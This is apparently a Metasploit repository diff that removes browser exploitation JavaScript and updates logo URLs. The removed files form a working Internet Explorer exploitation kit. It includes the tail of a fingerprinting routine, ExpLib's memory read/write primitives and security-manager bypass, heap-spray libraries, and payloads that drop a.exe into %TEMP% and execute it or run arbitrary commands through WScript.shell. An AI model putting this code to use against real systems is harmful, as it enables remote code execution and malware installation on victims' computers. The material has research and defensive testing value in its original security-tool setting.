else if (version.indexOf("windows nt 5.2") != -1) { os_name = "Windows 2003"; }
else if (version.indexOf("windows nt 6.0") != -1) { os_name = "Windows Vista"; }
else if (version.indexOf("windows nt 6.1") != -1) { os_name = "Windows 7"; }
else if (version.indexOf("windows nt 6.2") != -1) { os_name = "Windows 8"; }
else if (version.indexOf("windows nt 6.3") != -1) { os_name = "Windows 8.1"; }
}
if (os_name == oses_linux && (!os_vendor || 0 == os_vendor.length)) {
if (version.indexOf("gentoo") != -1) { os_vendor = "Gentoo"; }
else if (version.indexOf("ubuntu") != -1) { os_vendor = "Ubuntu"; }
else if (version.indexOf("debian") != -1) { os_vendor = "Debian"; }
else if (version.indexOf("rhel") != -1) { os_vendor = "RHEL"; }
else if (version.indexOf("red hat") != -1) { os_vendor = "RHEL"; }
else if (version.indexOf("centos") != -1) { os_vendor = "CentOS"; }
else if (version.indexOf("fedora") != -1) { os_vendor = "Fedora"; }
else if (version.indexOf("android") != -1) { os_vendor = "Android"; }
}
//--
// Language
//--
if (navigator.systemLanguage) {
// ie
os_lang = navigator.systemLanguage;
} else if (navigator.language) {
// gecko derivatives, safari, opera
os_lang = navigator.language;
} else {
// some other browser and we don't know how to get the language, so
// just guess english
os_lang = "en";
}
//--
// Architecture
//--
if (typeof(navigator.cpuClass) != 'undefined') {
// Then this is IE or Opera9+ and we can grab the arch directly
switch (navigator.cpuClass) {
case "x86":
arch = arch_x86;
break;
case "x64":
arch = arch_x86_64;
break;
}
}
if (!arch || 0 == arch.length) {
// We don't have the handy-dandy navagator.cpuClass, so infer from
// platform
version = navigator.platform;
//document.write(version + "\\n");
// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
// 64-bit client on Windows 7, 64-bit:
// Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
// 32-bit client on Windows 7, 64-bit:
// Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
// 32-bit client on Vista, 32-bit, "Compatibility View":
// Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
//
// Report 32-bit client on 64-bit OS as being 32 because exploits will
// need to know the bittedness of the process, not the OS.
if ( ("Win32" == version) || (version.match(/i.86/)) ) {
arch = arch_x86;
} else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64'))) {
arch = arch_x86_64;
} else if (-1 != version.indexOf('PPC')) {
arch = arch_ppc;
}
}
this.ua_is_lying = ua_is_lying;
this.os_name = os_name;
this.os_vendor = os_vendor;
this.os_flavor = os_flavor;
this.os_device = os_device;
this.os_sp = os_sp;
this.os_lang = os_lang;
this.arch = arch;
this.ua_name = ua_name;
this.ua_version = ua_version;
this.ua_version = ua_version;
return { os_name:os_name, os_vendor:os_vendor, os_flavor:os_flavor, os_device:os_device, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
}; // function getVersion
os_detect.searchVersion = function(needle, haystack) {
var index = haystack.indexOf(needle);
var found_version;
if (index == -1) { return; }
found_version = haystack.substring(index+needle.length+1);
if (found_version.indexOf(' ') != -1) {
// Strip off any junk at the end such as a CLR declaration
found_version = found_version.substring(0,found_version.indexOf(' '));
}
return found_version;
};
/*
* Return -1 if a < b, 0 if a == b, 1 if a > b
*/
ua_ver_cmp = function(ver_a, ver_b) {
// shortcut the easy case
if (ver_a == ver_b) {
return 0;
}
a = ver_a.split(".");
b = ver_b.split(".");
for (var i = 0; i < Math.max(a.length, b.length); i++) {
// 3.0 == 3
if (!b[i]) { b[i] = "0"; }
if (!a[i]) { a[i] = "0"; }
if (a[i] == b[i]) { continue; }
a_int = parseInt(a[i]);
b_int = parseInt(b[i]);
a_rest = a[i].substr(a_int.toString().length);
b_rest = b[i].substr(b_int.toString().length);
if (a_int < b_int) {
return -1;
} else if (a_int > b_int) {
return 1;
} else { // ==
// Then we need to deal with the stuff after the ints, e.g.:
// "b4pre"
if (a_rest == "b" && b_rest.length == 0) {
return -1;
}
if (b_rest == "b" && a_rest.length == 0) {
return 1;
}
// Just give up and try a lexicographical comparison
if (a_rest < b_rest) {
return -1;
} else if (a_rest > b_rest) {
return 1;
}
}
}
// If we get here, they must be equal
return 0;
};
ua_ver_lt = function(a, b) {
if (-1 == this.ua_ver_cmp(a,b)) { return true; }
return false;
};
ua_ver_gt = function(a, b) {
if (1 == this.ua_ver_cmp(a,b)) { return true; }
return false;
};
ua_ver_eq = function(a, b) {
if (0 == this.ua_ver_cmp(a,b)) { return true; }
return false;
};

426
data/js/memory/explib2/lib/explib2.js
View File

@ -1,426 +0,0 @@
ExpLib = (function() {
function ExpLib( num_arrays, arr_size, base, payload ) {
this.arr1 = null;
this.arr2 = null;
this.base = base;
this.arr_size = arr_size;
this.arr_arr = null;
// Allows to control the contents of the sprayed memory.
// Have into account some array positions will be corrupted
// while leaking and modifying things.
this.arr_contents = [];
this.payload = payload;
this.modules = {}
this.getproc = null;
this.loadlibrary = null;
// Offset to the Origin URL in the Stream, modifying it
// allows to bypass msado15.SecurityCheck(), allowing
// for example to write stream contents to filesystem.
this.stream_origin = 0x44;
}
ExpLib.prototype.resolveAPI = function( modulename, procname ) {
var module = this.resolveModule( modulename );
return this.callAPI( this.getproc, module, this.allocateString(procname) );
}
ExpLib.prototype.resolveModule = function( modulename ) {
if ( this.modules[modulename] )
return this.modules[modulename];
var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
this.modules[modulename] = module;
return module;
}
ExpLib.prototype.spray = function() {
this.arr_arr = new Array( num_arrays );
var decl = "[";
for ( var i = 0; i < this.arr_size - 1; ++ i ) {
decl += '0,';
}
decl += '0';
decl += ']';
for ( var i = 0; i < num_arrays; ++ i ) {
this.arr_arr[i] = eval(decl);
for(var j = 0; j < this.arr_contents.length; j++) {
this.arr_arr[i][j] = this.arr_contents[j];
}
}
}
// Should be used before calling spray()
ExpLib.prototype.setArrContents = function(contents) {
for(var i = 0; i < this.arr_size && i < contents.length; i++) {
this.arr_contents[i] = contents[i];
}
}
ExpLib.prototype.setValue = function(i1, i2, v) {
this.arr_arr[i1][i2] = v;
}
ExpLib.prototype.setValueByAddr = function(index, addr, v) {
this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
}
ExpLib.prototype.read32 = function(addr) {
if ( addr % 4 ) {
// error
}
if ( addr >= this.arr2_member_base ) {
return this.arr2[(addr - this.arr2_member_base)/4];
} else {
return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
}
}
ExpLib.prototype.write32 = function(addr, value) {
if ( addr % 4 ) {
// error
}
if ( value >= 0x80000000 )
value = -(0x100000000 - value);
//alert(((addr - this.arr2_member_base)/4).toString(16));
if ( addr >= this.arr2_member_base ) {
this.arr2[(addr - this.arr2_member_base)/4] = value;
} else {
this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
}
}
ExpLib.prototype.read8 = function(addr) {
var value = this.read32( addr & 0xfffffffc );
switch ( addr % 4 ) {
case 0: return (value & 0xff);
case 1: return ((value >> 8) & 0xff);
case 2: return ((value >> 16) & 0xff);
case 3: return ((value >> 24) & 0xff);
}
return 0;
}
ExpLib.prototype.write8 = function(addr, value) {
var original_value = this.read32( addr & 0xfffffffc );
var new_value;
switch ( addr % 4 ) {
case 0:
new_value = (original_value & 0xffffff00) | (value & 0xff);
break;
case 1:
new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
break;
case 2:
new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
break;
case 3:
new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
break;
}
this.write32( addr & 0xfffffffc, new_value );
}
ExpLib.prototype.writeBytes = function(addr, bytes) {
for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
this.write32( addr + i, value );
}
for ( ; i < bytes.length; ++ i ) {
this.write8( addr + i, bytes[i] );
}
}
ExpLib.prototype.writeString = function(addr, s) {
var bytes = [];
var i = 0;
for ( ; i < s.length; ++ i ) {
bytes[i] = s.charCodeAt(i);
}
bytes[i] = 0;
this.writeBytes( addr, bytes );
}
ExpLib.prototype.writeStringW = function(addr, s) {
var bytes = [];
var i = 0;
for ( ; i < s.length; ++i ) {
bytes[i * 2] = s.charCodeAt(i);
bytes[i * 2 + 1] = 0;
}
bytes[s.length * 2] = 0;
bytes[s.length * 2 + 1] = 0;
this.writeBytes( addr, bytes );
}
ExpLib.prototype.read16 = function(addr) {
if ( addr % 2 ) {
// error, not aligned
}
var value = this.read32( addr & 0xfffffffc );
switch ( addr % 4 ) {
case 0: return (value & 0xffff);
case 1: return ((value >> 8) & 0xffff);
case 2: return ((value >> 16) & 0xffff);
case 3: /*not supported*/ break;
}
return 0;
}
ExpLib.prototype.strequal = function(addr, s) {
for ( var i = 0; i < s.length; ++ i ) {
if ( this.read8(addr + i) != s.charCodeAt(i) )
return false;
}
return true;
}
ExpLib.prototype.getModuleBase = function(addr) {
var cur_addr = addr;
while ( cur_addr > 0 ) {
if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
return cur_addr;
}
cur_addr -= 0x10000;
}
return 0;
}
ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
var cur_table = import_table;
while ( cur_table < import_table + 0x1000 ) {
var name_addr = base + this.read32(cur_table + 12);
if ( this.strequal( name_addr, name ) ) {
var iat = base + this.read32(cur_table + 16);
var func = this.read32(iat);
while ( 0 == func ) {
iat += 4;
func = this.read32(iat);
}
return this.getModuleBase( func & 0xFFFF0000 );
}
cur_table += 20;
}
return 0;
}
ExpLib.prototype.getProcAddress = function(base, procname) {
var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
var num_functions = this.read32( export_table + 20 );
var addr_functions = base + this.read32( export_table + 28 );
var addr_names = base + this.read32( export_table + 32 );
var addr_ordinals = base + this.read32( export_table + 36 );
for ( var i = 0; i < num_functions; ++ i ) {
var name_addr = this.read32( addr_names + i * 4 ) + base;
if ( this.strequal( name_addr, procname ) ) {
var ordinal = this.read16( addr_ordinals + i * 2 );
var result = this.read32( addr_functions + ordinal * 4 ) + base;
return result;
}
}
return 0;
}
ExpLib.prototype.searchBytes = function(pattern, start, end) {
if ( start >= end || start + pattern.length > end )
return 0;
var pos = start;
while ( pos < end ) {
for ( var i = 0; i < pattern.length; ++ i ) {
if ( this.read8(pos + i) != pattern[i] )
break;
}
if ( i == pattern.length ) {
return pos;
}
++ pos;
}
return 0;
}
ExpLib.prototype.getError = function(msg) {
return this.err_msg;
}
ExpLib.prototype.setError = function(msg) {
this.err_msg = msg;
}
ExpLib.prototype.setStreamOrigin = function(offset) {
this.stream_origin = offset;
}
ExpLib.prototype.getStreamOrigin = function() {
return this.stream_origin;
}
ExpLib.prototype.memcpy = function(dst, src, size) {
var i = 0;
for ( ; i < size - 4; i += 4 ) {
this.write32( dst + i, this.read32(src + i) );
}
for ( ; i < size; ++ i ) {
this.write8( dst + i, this.read8(src + i) );
}
}
ExpLib.prototype.go = function() {
var i = 0;
for ( ; i < this.arr_arr.length - 1; ++ i ) {
this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
this.arr_arr[i + 1].length = 0x3fffffff;
if ( this.arr_arr[i+1].length == 0x3fffffff ) {
break;
}
}
}
if ( i >= this.arr_arr.length - 1 ) {
this.setError( "Cannot find array with corrupt length!" );
return false;
}
this.arr1_idx = i;
this.arr2_idx = i + 1;
this.arr1 = this.arr_arr[i];
this.arr2 = this.arr_arr[i + 1];
this.arr2_base = this.base + 0x1000;
this.arr2_member_base = this.arr2_base + 0x20;
var func_addr = this.leakAddress(ActiveXObject);
var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
//alert(script_engine_addr.toString(16));
var original_securitymanager = this.read32( script_engine_addr + 0x21c );
if ( !original_securitymanager ) {
// let security manager to be valid
try {
var WshShell = new ActiveXObject("WScript.shell");
} catch (e) {}
original_securitymanager = this.read32( script_engine_addr + 0x21c );
}
var original_securitymanager_vtable = this.read32(original_securitymanager);
var securitymanager_size = 0x28;
var fake_securitymanager = 0x1a1b2010;
var fake_securitymanager_vtable = fake_securitymanager + 0x28;
//alert(original_securitymanager.toString(16));
this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
this.write32( fake_securitymanager, fake_securitymanager_vtable );
this.write32(script_engine_addr + 0x21c, fake_securitymanager);
var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
this.write32( fake_securitymanager_vtable + 0x14,
this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
this.write32( fake_securitymanager_vtable + 0x10,
this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
this.payload.execute(this);
/*
* restore
*/
this.write32( script_engine_addr + 0x21c, original_securitymanager );
return true;
}
ExpLib.prototype.leakAddress = function(obj) {
this.arr_arr[this.arr2_idx + 1][2] = obj;
return this.read32(this.arr2_member_base + 0x1008);
}
ExpLib.prototype.switchStreamOrigin = function(stream) {
var obj = this.leakAddress(stream);
var stream_obj = this.read32(obj + 0x30);
//var url_addr = this.read32(stream_obj + 0x3c);
var url_addr = this.read32(stream_obj + this.stream_origin);
/*
* bypass domain check
*/
this.writeStringW( url_addr, 'file:///C:/1.htm' );
}
return ExpLib;
})();

33
data/js/memory/explib2/payload/drop_exec.js
View File

@ -1,33 +0,0 @@
function payload_drop_exec(pe) {
this.execute = function(explib) {
var WshShell = new ActiveXObject("WScript.shell");
var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
var filename = temp + "\\a.exe";
var bStream = new ActiveXObject("ADODB.Stream");
var txtStream = new ActiveXObject("ADODB.Stream");
bStream.Type = 1;
txtStream.Type = 2;
bStream.Open();
txtStream.Open();
explib.switchStreamOrigin(txtStream);
txtStream.WriteText(pe);
txtStream.Position = 2;
txtStream.CopyTo( bStream );
txtStream.Close();
explib.switchStreamOrigin(bStream);
bStream.SaveToFile(filename, 2);
bStream.Close();
oExec = WshShell.Exec(filename);
}
return this;
}

10
data/js/memory/explib2/payload/exec.js
View File

@ -1,10 +0,0 @@
function payload_exec(cmd) {
this.execute = function(explib) {
var WshShell = new ActiveXObject("WScript.shell");
var oExec = WshShell.Exec(cmd);
}
return this;
}

17
data/js/memory/heap_spray.js
View File

@ -1,17 +0,0 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}

192
data/js/memory/heaplib2.js
View File

@ -1,192 +0,0 @@
//heapLib2 namespace
function heapLib2() { }
//These are attributes that will not actually create a bstr
//and directly use the back-end allocator, completely bypassing the cache
var global_attrs = ["title", "lang", "class"];
heapLib2.ie = function(element, maxAlloc)
{
//128mb
this.maxAlloc = 0x8000000;
//make sure that an HTML DOM element is passed
if(!element.nodeType || element.nodeType != 1)
throw "alloc.argument: element not valid";
this.element = element;
if(maxAlloc)
this.maxAlloc = maxAlloc;
//empty the cache
this.Oleaut32EmptyCache();
this.Oleaut32FillCache();
this.Oleaut32EmptyCache();
}
heapLib2.ie.prototype.newelement = function(element)
{
//make sure that an HTML DOM element is passed
if(!element.nodeType || element.nodeType != 1)
throw "alloc.argument: element not valid";
this.element = element;
}
heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok)
{
if(typeof(cache_ok)==='undefined')
cache_ok = false;
else
cache_ok = true;
//make sure the attribute name is a string
if(typeof attr_name != "string")
throw "alloc.argument: attr_name is not a string";
//make sure that the attribute name is not already present in the html element
if(this.element.getAttribute(attr_name))
throw "alloc.argument: element already contains attr_name: " + attr_name;
//ensure the size is a number
if(typeof size != "number")
throw "alloc.argument: size is not a number: " + size;
//make sure the size isn't one of the special values
if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000))
throw "alloc.argument: size cannot be flushed from cache: " + size;
if(size > this.maxAlloc)
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
//the size must be at a 16-byte boundary this can be commented out but
//the allocations will be rounded to the nearest 16-byte boundary
if(size % 16 != 0)
throw "alloc.argument: size be a multiple of 16: " + size;
//20-bytes will be added to the size
//<4-byte size><data><2-byte null>
size = ((size / 2) - 6);
//May have to change this due to allocation side effects
var data = new Array(size).join(cache_ok ? "C" : "$");
var attr = document.createAttribute(attr_name);
this.element.setAttributeNode(attr);
this.element.setAttribute(attr_name, data);
}
//These items will allocate/free memory and should really
//only be used once per element. You can use a new element
//by calling the 'newelement' method above
heapLib2.ie.prototype.alloc_nobstr = function(val)
{
//make sure the aval is a string
if(typeof val != "string")
throw "alloc.argument: val is not a string";
var size = (val.length * 2) + 6;
if(size > this.maxAlloc)
throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
var i = 0;
var set_gattr = 0;
for(i = 0; i < global_attrs.length; i++)
{
curr_gattr = global_attrs[i];
if(!this.element.getAttribute(curr_gattr))
{
this.element.setAttribute(curr_gattr, "");
this.element.setAttribute(curr_gattr, val);
set_gattr = 1;
break;
}
}
if(set_gattr == 0)
throw "alloc_nobstr: all global attributes are assigned, try a new element";
}
//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
heapLib2.ie.prototype.sprayalloc = function(attr_name, str)
{
//make sure the attribute name is a string
if(typeof attr_name != "string")
throw "alloc.argument: attr_name is not a string";
//make sure that the attribute name is not already present in the html element
if(this.element.getAttribute(attr_name))
throw "alloc.argument: element already contains attr_name: " + attr_name;
//ensure the size is a number
if(typeof str != "string")
throw "alloc.argument: str is not a string: " + typeof str;
var size = (str.length * 2) + 6;
//make sure the size isn't one of the special values
if(size <= 0x8000)
throw "alloc.argument: bigalloc must be greater than 0x8000: " + size;
if(size > this.maxAlloc)
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
var attr = document.createAttribute(attr_name);
this.element.setAttributeNode(attr);
this.element.setAttribute(attr_name, str);
}
heapLib2.ie.prototype.free = function(attr_name, skip_flush)
{
if(typeof(skip_flush)==='undefined')
skip_flush = false;
else
skip_flush = true;
//make sure that an HTML DOM element is passed
if(!this.element.nodeType || this.element.nodeType != 1)
throw "alloc.argument: element not valid";
//make sure the attribute name is a string
if(typeof attr_name != "string")
throw "alloc.argument: attr_name is not a string";
//make sure that the attribute name is not already present in the html element
if(!this.element.getAttribute(attr_name))
throw "alloc.argument: element does not contain attribute: " + attr_name;
//make sure the cache is full so the chunk returns the general purpose heap
if(!skip_flush)
this.Oleaut32FillCache();
this.element.setAttribute(attr_name, null);
if(!skip_flush)
this.Oleaut32EmptyCache()
}
heapLib2.ie.prototype.Oleaut32FillCache = function()
{
for(var i = 0; i < 6; i++)
{
this.free("cache0x20"+i, true);
this.free("cache0x40"+i, true);
this.free("cache0x100"+i, true);
this.free("cache0x8000"+i, true);
}
}
heapLib2.ie.prototype.Oleaut32EmptyCache = function()
{
for(var i = 0; i < 6; i++)
{
this.alloc("cache0x20"+i, 0x20, true);
this.alloc("cache0x40"+i, 0x40, true);
this.alloc("cache0x100"+i, 0x100, true);
this.alloc("cache0x8000"+i, 0x8000, true);
}
}

31
data/js/memory/mstime_malloc.js
View File

@ -1,31 +0,0 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}

38
data/js/memory/property_spray.js
View File

@ -1,38 +0,0 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}

18
data/js/network/ajax_download.js
View File

@ -1,18 +0,0 @@
function ajax_download(oArg) {
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}

18
data/js/network/ajax_post.js
View File

@ -1,18 +0,0 @@
function postInfo(path, data, cb) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, !!cb);
if (cb) {
xmlHttp.onreadystatechange = function() {
if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
};
}
xmlHttp.send(data);
return xmlHttp;
}

15
data/js/network/xhr_shim.js
View File

@ -1,15 +0,0 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}

126
data/js/utils/base64.js
View File

@ -1,126 +0,0 @@
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\r\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};

2
data/logos/3kom-superhack.txt
View File

@ -15,5 +15,5 @@
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
| http://metasploit.pro |
| http://metasploit.com |
|______________________________________________________________________________|%clr

2
data/logos/metasploit-shield.txt
View File

@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.pro
%clr%bld http://metasploit.com

2
data/logos/missile-command.txt
View File

@ -27,4 +27,4 @@
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
http://metasploit.pro%clr
http://metasploit.com%clr

2
data/logos/ninja.txt
View File

@ -27,4 +27,4 @@
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro%clr
http://metasploit.com%clr

2
data/logos/r7-metasploit.txt
View File

@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

2
data/logos/wake-up-neo.txt
View File

@ -23,4 +23,4 @@
; ,''-,;' ``-
``-..__``--`
http://metasploit.pro%clr
http://metasploit.com%clr

29
data/markdown_doc/auxiliary_scanner_template.erb Normal file
View File

@ -0,0 +1,29 @@
This module is a scanner module, and is capable of testing against multiple hosts.
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
